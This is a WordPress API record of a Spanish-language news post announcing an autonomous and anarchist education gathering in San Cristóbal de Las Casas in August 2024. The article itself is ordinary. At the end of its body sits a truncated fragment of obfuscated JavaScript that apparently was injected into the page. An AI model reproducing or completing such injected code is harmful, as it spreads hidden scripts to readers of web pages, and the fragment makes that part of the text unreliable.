{"id":16876,"date":"2024-07-25T01:05:01","date_gmt":"2024-07-25T01:05:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16876"},"modified":"2024-07-25T01:05:02","modified_gmt":"2024-07-25T01:05:02","slug":"sclc-sera-sede-de-la-primera-conspiracion-de-educaciones-autonomas-y-anarquistas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16876","title":{"rendered":"SCLC ser\u00e1 sede de la Primera Conspiraci\u00f3n de Educaciones Aut\u00f3nomas y Anarquistas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"720\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240724-WA0019.jpg\" alt=\"\" class=\"wp-image-16877\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240724-WA0019.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240724-WA0019-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240724-WA0019-150x150.jpg 150w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>24 de julio del 2024. San Crist\u00f3bal de Las Casas.- Esta ciudad ser\u00e1 sede de la Primera Conspiraci\u00f3n de Educaciones Aut\u00f3nomas y Educaciones Anarquistas, donde se espera la presencia de educadores y entusiastas de la educaci\u00f3n aut\u00f3noma y anarquista en un evento sin precedentes, lo cual se llevar\u00e1 a cabo del 9 al 11 de agosto, con un programa lleno de actividades y discusiones enriquecedoras.<\/p>\n\n\n\n<p>En la invitaci\u00f3n se aclara que los organizadores priorizar\u00e1n el hospedaje y la alimentaci\u00f3n (incluyendo una comida diaria y caf\u00e9 durante los recesos) para aquellos participantes que se registren previamente y provengan de territorios lejanos o que asistan con infancias. \u201cSe recomienda a todos los asistentes traer bolsas de dormir y\/o cobijas para aprovechar las zonas de descanso disponibles\u201d.<\/p>\n\n\n\n<p>\u201cLa Conspiraci\u00f3n ser\u00e1 transmitida en vivo durante los tres d\u00edas a trav\u00e9s de la p\u00e1gina conerre.tv y por FB Live en las p\u00e1ginas de la Coordinadora Anarquista Tejiendo Libertad y La Pizarra Negra &amp; Kuxtal Corp, asegurando as\u00ed que nadie se pierda de este importante encuentro\u201d, se\u00f1alan.<\/p>\n\n\n\n<p>Por \u00faltimo, recomiendan que para obtener m\u00e1s informaci\u00f3n o resolver cualquier duda, los interesados pueden escribir a los correos electr\u00f3nicos LaGrieta1@riseup.com y lapizarraykutxal@gmail.com.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 24 de julio del 2024. San Crist\u00f3bal de Las Casas.- Esta ciudad ser\u00e1 sede de la Primera Conspiraci\u00f3n de Educaciones Aut\u00f3nomas y Educaciones Anarquistas, donde se espera la presencia de educadores y entusiastas de la educaci\u00f3n aut\u00f3noma y anarquista en un evento sin precedentes, lo cual se llevar\u00e1 a cabo del 9 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16877,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16876","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16876","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16876"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16876\/revisions"}],"predecessor-version":[{"id":16878,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16876\/revisions\/16878"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16877"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16876"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16876"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16876"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}